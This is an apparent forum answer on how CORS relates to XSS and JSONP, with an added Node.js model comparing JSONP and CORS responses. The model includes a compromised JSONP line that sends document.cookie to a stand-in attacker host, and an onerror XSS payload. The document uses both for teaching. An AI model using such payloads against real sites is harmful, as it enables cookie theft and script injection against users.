Cross-site scripting (XSS) is mentioned in the Wikipedia page for CORS. But I don't see how they are related. What's the connection between CORS and XSS?
XSS is mentioned on the Wikipedia article in relation to JSONP, not CORS.
In JSONP you reference a page containing data you want to include client side in your page like so:
You then have a JavaScript function on your page called foo that will be called by the external site (example.com in this case) to pass the data through that your client-side requires.
However, if example.com gets compromised, then, as you are trusting example.com as a source of scripts, an attacker can take your site with it and own the client-side code. For example, they could be redirecting visitors to their own site, sending themselves your visitors' cookies, or injecting JavaScript keyloggers instead of calling your foo function.
With CORS though, if example.com sets the correct headers to allow your site to make AJAX calls to it and retrieve the data, then, as you should be treating the data as untrusted input rather than HTML, it is less likely that your site is necessarily compromised. It does depend on what the data is: if it is in fact preformatted HTML and you are outputting it as is, then a compromised external site could still affect yours via XSS. However, this is definitely the case with JSONP.
Another point is that if there are any XSS bugs on your site, it would make any CORS restrictions irrelevant. The attacking website would be able to use the XSS vuln to "bypass" the Same Origin Policy at DOM level rather than via XHR. If they needed some information that can only be retrieved from your origin by an AJAX request, they would simply use the XSS attack to inject the script required to do this and send it back to their own domain.
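The distinction the answer draws, as an added Node.js model that is not part of the original answer: a JSONP response is a script that the browser runs in your origin, so a compromised example.com gets code execution for free, whereas a CORS response is only data and becomes dangerous only if your page chooses to interpret it as markup. The browser is stood in for by a few assumed objects (a fake document with a cookie, sendBeacon as the outbound-request sink, and new Function in place of a script tag), and all responses are constructed.

```javascript
// Added example, not code from the original answer. Models a page that pulls
// data from example.com via JSONP versus via CORS, before and after example.com
// is compromised. Assumptions: `document`, `sendBeacon` and `new Function`
// stand in for the real page, its cookie jar, a network sink such as
// `new Image().src = url`, and the browser executing a <script src=...> tag.

// Minimal model of the page's environment: one cookie, one request log.
function makeBrowser() {
  const requests = [];
  return {
    document: { cookie: "session=abc123" },
    sendBeacon: (url) => requests.push(url), // stand-in for exfil via an image/fetch
    requests,
  };
}

// JSONP: the response *is* a script. <script src="https://example.com/..."> runs it
// in your origin with access to everything your own code can reach, not just `foo`.
function loadJsonp(responseScript, browser) {
  let received = null;
  const foo = (data) => { received = data; }; // the page's callback
  const run = new Function("foo", "document", "sendBeacon", responseScript);
  run(foo, browser.document, browser.sendBeacon);
  return received;
}

// CORS: the response is a byte string handed to your code. Parsing it never
// executes anything; a malformed or hostile body throws or yields hostile *data*.
function loadCors(responseBody) {
  return JSON.parse(responseBody);
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Two ways to put the fetched data into the page. Each returns the HTML string
// that would be assigned to innerHTML; the safe path is equivalent to textContent.
function renderAsText(items) {
  return items.map((i) => "<li>" + escapeHtml(String(i)) + "</li>").join("");
}
function renderAsHtml(items) { // unsafe: treats untrusted data as markup
  return items.map((i) => "<li>" + i + "</li>").join("");
}

// Constructed responses from example.com, honest and after compromise.
const HONEST_JSONP = 'foo({"items":["a","b"]});';
const COMPROMISED_JSONP =
  'sendBeacon("https://attacker.invalid/c?" + encodeURIComponent(document.cookie));' +
  'foo({"items":["a","b"]});'; // still calls foo, so the page looks perfectly normal
const HONEST_JSON = '{"items":["a","b"]}';
const COMPROMISED_JSON = '{"items":["<img src=x onerror=alert(1)>"]}';

function demo() {
  const honest = makeBrowser();
  const jsonpData = loadJsonp(HONEST_JSONP, honest);
  const owned = makeBrowser();
  loadJsonp(COMPROMISED_JSONP, owned);
  const corsData = loadCors(HONEST_JSON);
  const hostile = loadCors(COMPROMISED_JSON);
  return {
    jsonpHonest: jsonpData.items,
    jsonpExfiltrated: owned.requests,           // cookie left the page; no rendering bug needed
    jsonpExfiltratedHonest: honest.requests,    // empty: the honest script only called foo
    corsHonest: corsData.items,
    corsSafeRender: renderAsText(hostile.items),   // "&lt;img ..." is inert text
    corsUnsafeRender: renderAsHtml(hostile.items), // markup reaches the DOM: XSS
  };
}

console.log(demo());
```

The same new Function model also covers the answer's last point: any XSS bug on your site puts attacker script in exactly the position the compromised JSONP script holds, so it can call your own same-origin fetch and forward the result, and the CORS headers on the other end never enter into it.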